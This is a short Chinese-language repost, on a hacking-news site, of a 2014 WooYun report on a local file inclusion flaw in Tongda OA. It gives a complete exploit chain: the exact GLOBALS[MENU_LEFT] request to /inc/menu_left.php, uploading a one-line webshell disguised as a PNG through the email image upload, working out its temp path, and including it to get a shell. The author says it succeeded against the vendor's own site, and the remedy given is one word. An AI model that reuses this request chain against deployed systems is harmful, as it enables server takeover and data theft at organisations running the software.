记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

通达OA本地文件包含可拿SHELL

2014-08-16 17:20

foeeach($MENU_LEFT as $MENU)

if(is_array($MENU['module'])){

include_once($include_file);

}

通达OA的/inc/menu_left.php文件include_file参数没有过滤,导致可以包含任意文件。

要执行到 include_once($include_file),需要两个条件,MENU_LEFT参数是数组,他的子成员MENU也要是数组,MENU['module']还要是数组才行。

通达OA默认register_globals是开启的,所以可以用GLOBALS传递参数。

所以提交GLOBALS[MENU_LEFT][A][module][1]=a&include_file=../robots.txt就可以包含文件了。

漏洞证明:

要想拿shell,就要传一个一句话上去,然后包含。

打开发邮件的功能,选择批量插入图片,然后传一个图片后缀的一句话木马1.png

抓包,可以看到/module/upload/upload.php返回了

{"id":"170818@1405_183125983,","name":"1.png*",

那么图片的地址就是../../attach/upload_temp/1405/183125983.1.png

shell地址就是

/inc/menu_left.php?GLOBALS[MENU_LEFT][A][module][1]=a&include_file=../../attach/upload_temp/1405/183125983.1.png

官网测试成功。

oa.png

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2014-061251

阅读:356407 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“通达OA本地文件包含可拿SHELL”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云